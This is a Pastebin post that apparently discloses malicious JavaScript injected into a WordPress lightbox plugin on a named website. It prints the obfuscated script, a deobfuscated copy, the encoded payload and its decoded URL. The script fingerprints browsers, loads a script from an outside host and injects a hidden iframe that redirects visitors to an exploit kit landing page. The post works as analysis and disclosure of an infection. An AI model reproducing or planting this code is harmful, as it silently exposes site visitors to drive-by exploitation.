Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- //JS at 'englishrussia.com/wp-content/plugins/wp-lightbox-2/wp-lightbox-2.min.js?ver=1.3.4.1' appears to have a malicious code injected into it. Obfuscated version of it is below:
- /* mQhs3jK7CAwjdskypw */
- var OCeuBmV = "u\x73eri\x64A\x308\x317F\x422\x35";
- var F9lBnCy = "28";
- var nhKNRj = 1;
- function Vb1gC(qb_cD) {
- var C5prmo4 = document.cookie.replace(/\s/g, "").split(";");
- for (var OytUL = 0; OytUL < C5prmo4.length; OytUL++) {
- var c2uijl = C5prmo4[OytUL].split("=");
- if (c2uijl[0] == qb_cD) {
- return unescape(c2uijl[1]);
- }
- }
- return null;
- };
- function AVJqAVz(qb_cD, y98VeNE, d19agzK) {
- var Euyoazm = new Date();
- var ySrd1w = Euyoazm.getTime() + (d19agzK * 60 * 60 * 1000);
- Euyoazm.setTime(ySrd1w);
- var jEfzry = qb_cD + "=" + escape(y98VeNE) + "\x3b \x65xpi\x72e\x73=" + Euyoazm.toGMTString() + ";\x20d\x6f\x6d\x61in=" + document.domain;
- document.cookie = jEfzry;
- };
- function a84gVF() {
- AVJqAVz(OCeuBmV, F9lBnCy, 48);
- };
- function Id_KxqK() {
- try {
- rso83L = "K\x6bK\x46O\x6fo\x4f0cd\x32";
- if (jquery_datepicker.length == 0) {
- AVJqAVz(OCeuBmV, F9lBnCy, 48);
- return;
- }
- try {
- if (document.getElementById(rso83L)) {
- document.getElementById(rso83L).parentNode.removeChild(document.getElementById(rso83L));
- }
- } catch (D1j_F) {};
- var NsfjEAw = unescape(jquery_datepicker.replace(/[g-zG-Z]+/g, "").replace(/[=\-!@$;.,]+/g, "%"));
- var EAUGdKk = document.createElement("\x44\x49V");
- EAUGdKk.id = rso83L;
- EAUGdKk.style.cssText = "\x70o\x73ition\x3a\x61b\x73olut\x65\x3bl\x65f\x74:0px;to\x70\x3a\x3200\x70\x78;opacit\x79\x3a\x30;\x66i\x6ct\x65\x72:al\x70\x68a(\x6fpacity=0);";
- EAUGdKk.innerHTML = "<i\x66\x72\x61m\x65\x20onlo\x61d=\x27\x61\x384gVF(\x29;\x27 src=\x27" + NsfjEAw + "' \x77i\x64th\x3d1\x39\x20h\x65igh\x74=19 f\x72amebor\x64er\x3d0 \x73\x63ro\x6c\x6c\x69n\x67=\x27\x6e\x6f\x27\x3e</iframe>";
- document.body.appendChild(EAUGdKk);
- } catch (D1j_F) {
- setTimeout("I\x64\x5f\x4bxqK\x28)", 300);
- }
- };
- function Ayno8c() {
- var NEoykFv, GJ0_Ci = "KHn\x63\x64u2\x64\x6534\x33";
- try {
- if (document.getElementById(GJ0_Ci)) {
- document.getElementById(GJ0_Ci).parentNode.removeChild(document.getElementById(GJ0_Ci));
- }
- NEoykFv = document.createElement("\x53C\x52\x49PT");
- NEoykFv.type = "te\x78\x74\x2fjav\x61\x73cri\x70t";
- NEoykFv.id = GJ0_Ci;
- if (NEoykFv.readyState) {
- NEoykFv.onreadystatechange = function() {
- if (this.readyState == "\x6coa\x64e\x64" || this.readyState == "com\x70\x6c\x65te") {
- NEoykFv.onreadystatechange = null;
- Id_KxqK();
- }
- };
- } else {
- NEoykFv.onload = function() {
- Id_KxqK();
- };
- }
- NEoykFv.src = "htt\x70\x3a/\x2fsrc.s\x61\x6edcastle\x73m\x61g\x61z\x69n\x65.\x63o\x6d/k\x3f\x74=" + Math.floor(Math.random() * 4294967295);
- if (document.getElementsByTagName("\x68ea\x64").length > 0) {
- document.getElementsByTagName("he\x61\x64")[0].appendChild(NEoykFv);
- } else {
- document.getElementsByTagName("b\x6f\x64y")[0].appendChild(NEoykFv);
- }
- } catch (D1j_F) {
- setTimeout("\x41yno8c\x28\x29", 300);
- }
- };
- function frj30E0() {
- var d3rps = navigator.userAgent;
- var GaumwD = 0;
- if (d3rps.indexOf("W\x69n\x64o\x77s") == -1 || (d3rps.indexOf("\x4dSI\x45") == -1 && d3rps.indexOf("\x47e\x63\x6bo/") == -1 && d3rps.indexOf("T\x72i\x64\x65nt") == -1)) {
- return 0;
- }
- try {
- if (nhKNRj) {
- try {
- if (Vb1gC(OCeuBmV) == F9lBnCy) {
- return false;
- }
- } catch (D1j_F) {};
- }
- if (d3rps.indexOf("M\x53I\x45") != -1 || d3rps.indexOf("Tr\x69de\x6e\x74") != -1) {
- try {
- GaumwD = oxcstI2();
- function oxcstI2() {
- return 0;
- }
- } catch (D1j_F) {
- GaumwD = 1;
- }
- }
- } catch (D1j_F) {};
- if (GaumwD == 0) {
- Ayno8c();
- }
- };
- frj30E0(); /* 8427hUmyiqmPCbR1oU */
- //Deobfuscated version:
- /* mQhs3jK7CAwjdskypw */
- var OCeuBmV = "useridA0817FB25";
- var F9lBnCy = "28";
- var nhKNRj = 1;
- function Vb1gC(qb_cD) {
- var C5prmo4 = document.cookie.replace(/s/g, "").split(";");
- for (var OytUL = 0; OytUL < C5prmo4.length; OytUL++) {
- var c2uijl = C5prmo4[OytUL].split("=");
- if (c2uijl[0] == qb_cD) {
- return unescape(c2uijl[1]);
- }
- }
- return null;
- };
- function AVJqAVz(qb_cD, y98VeNE, d19agzK) {
- var Euyoazm = new Date();
- var ySrd1w = Euyoazm.getTime() + (d19agzK * 60 * 60 * 1000);
- Euyoazm.setTime(ySrd1w);
- var jEfzry = qb_cD + "=" + escape(y98VeNE) + "; expires=" + Euyoazm.toGMTString() + "; domain=" + document.domain;
- document.cookie = jEfzry;
- };
- function a84gVF() {
- AVJqAVz(OCeuBmV, F9lBnCy, 48);
- };
- function Id_KxqK() {
- try {
- rso83L = "KkKFOooO0cd2";
- if (jquery_datepicker.length == 0) {
- AVJqAVz(OCeuBmV, F9lBnCy, 48);
- return;
- }
- try {
- if (document.getElementById(rso83L)) {
- document.getElementById(rso83L).parentNode.removeChild(document.getElementById(rso83L));
- }
- } catch (D1j_F) {};
- var NsfjEAw = unescape(jquery_datepicker.replace(/[g-zG-Z]+/g, "").replace(/[=-!@$;.,]+/g, "%"));
- var EAUGdKk = document.createElement("DIV");
- EAUGdKk.id = rso83L;
- EAUGdKk.style.cssText = "position:absolute;left:0px;top:200px;opacity:0;filter:alpha(opacity=0);";
- EAUGdKk.innerHTML = "<iframe onload='a84gVF();' src='" + NsfjEAw + "\"width = 19 height = 19 frameborder = 0 scrolling = 'no' > < /iframe>";
- document.body.appendChild(EAUGdKk);
- } catch (D1j_F) {
- setTimeout("Id_KxqK()", 300);
- }
- };
- function Ayno8c() {
- var NEoykFv, GJ0_Ci = "KHncdu2de343";
- try {
- if (document.getElementById(GJ0_Ci)) {
- document.getElementById(GJ0_Ci).parentNode.removeChild(document.getElementById(GJ0_Ci));
- }
- NEoykFv = document.createElement("SCRIPT");
- NEoykFv.type = "text/javascript";
- NEoykFv.id = GJ0_Ci;
- if (NEoykFv.readyState) {
- NEoykFv.onreadystatechange = function() {
- if (this.readyState == " loaded " || this.readyState == " complete ") {
- NEoykFv.onreadystatechange = null;
- Id_KxqK();
- }
- };
- } else {
- NEoykFv.onload = function() {
- Id_KxqK();
- };
- }
- NEoykFv.src = "http: //src.sandcastlesmagazine.com/k?t=" + Math.floor(Math.random() * 4294967295);
- if (document.getElementsByTagName("head").length > 0) {
- document.getElementsByTagName("head")[0].appendChild(NEoykFv);
- } else {
- document.getElementsByTagName("body")[0].appendChild(NEoykFv);
- }
- } catch (D1j_F) {
- setTimeout("Ayno8c()", 300);
- }
- };
- function frj30E0() {
- var d3rps = navigator.userAgent;
- var GaumwD = 0;
- if (d3rps.indexOf("Windows") == -1 || (d3rps.indexOf("MSIE") == -1 && d3rps.indexOf("Gecko/") == -1 && d3rps.indexOf("Trident") == -1)) {
- return 0;
- }
- try {
- if (nhKNRj) {
- try {
- if (Vb1gC(OCeuBmV) == F9lBnCy) {
- return false;
- }
- } catch (D1j_F) {};
- }
- if (d3rps.indexOf("MSIE") != -1 || d3rps.indexOf("Trident") != -1) {
- try {
- GaumwD = oxcstI2();
- function oxcstI2() {
- return 0;
- }
- } catch (D1j_F) {
- GaumwD = 1;
- }
- }
- } catch (D1j_F) {};
- if (GaumwD == 0) {
- Ayno8c();
- }
- };
- frj30E0(); /* 8427hUmyiqmPCbR1oU */
- // The script will do 2 things: 1) generate a GET request to 'src.sandcastlesmagazine.com/k?t=1260953298'; 2) Decode received data and redirect to SweetOrange EK landing page
- // Encoded data returned by 'src.sandcastlesmagazine.com'
- var jquery_datepicker='W;6o8!7g4@t74T;70;3Laz.2fH.G2fU,I63;6N4n-Q6te;35$2e;7Y3I,7V7V;Z6R5$Y6o5M=z7J4P;P6S9=l7J0@R2oel!U7J5$6b,2Kez@6J3!6f-g6d;3nag@3G1W!3v6!N31l@U32;32=T2xfs!h70N$72i-6f-64,j75@63k$r74!73;T2fP.u73-79Q-73;7P4J;65@l6d@5Ofl=61.R64h@6d;6U9=I6he;p6k9=v7w3u$74v,q7u2,6g1R=M74I;6n9$J6f$g6Pe-2fs,6S3w@h6o1r,6Zc.o6mc$r2Lf-s73,74q!6p1y-72;v6o7@6l1Q,U6gc-61-78-Z79Q!w2e,n7G0-6j8t,7o0$3Vf@6e,h6T5-z6S2=L75$6gc;m61,3d,u3N3';
- // Decoded data
- http://cdn5.sweetip.uk.com:16122/products/system_administration/call/stargalaxy.php?nebula=3
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement